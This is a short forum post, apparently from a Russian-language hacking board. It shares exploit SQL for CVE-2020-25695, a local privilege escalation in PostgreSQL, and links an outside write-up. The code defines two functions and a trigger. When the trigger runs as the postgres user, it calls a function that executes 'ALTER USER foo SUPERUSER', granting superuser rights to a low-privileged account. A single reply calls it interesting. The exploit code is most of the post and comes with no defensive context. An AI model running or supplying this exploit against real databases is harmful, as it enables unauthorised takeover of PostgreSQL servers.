Local Privilege Escalation, PostgreSQL, CVE-2020-25695

pablo · 18.12.2020

CVE-2020-25695 Privilege Escalation in Postgresql - Staaldraad

https://staaldraad.github.io/post/2020-12-15-cve-2020-25695-postgresql-privesc/

Код:

-- Low privileged function

CREATE OR REPLACE FUNCTION snfunc(integer) RETURNS integer
   LANGUAGE sql
   SECURITY INVOKER AS
'INSERT INTO tmp.public.t1 VALUES (current_user); SELECT $1';

-- High privileged function

CREATE OR REPLACE FUNCTION snfunc2(integer) RETURNS integer
   LANGUAGE sql
   SECURITY INVOKER AS
'INSERT INTO tmp.public.t1 VALUES (current_user);
ALTER USER foo SUPERUSER;
SELECT $1';

-- updated trigger

CREATE OR REPLACE FUNCTION strig() RETURNS trigger
AS $e$
BEGIN
IF current_user = 'postgres' THEN
    PERFORM tmp.public.snfunc2(1000); RETURN NEW;
ELSE
    PERFORM tmp.public.snfunc(1000); RETURN NEW;
END IF;
END $e$
LANGUAGE plpgsql;

pyx0rnull · 21.12.2020

очень интересно!

Local Privilege Escalation, PostgreSQL, CVE-2020-25695

pablo

(L2) cache

pyx0rnull

floppy-диск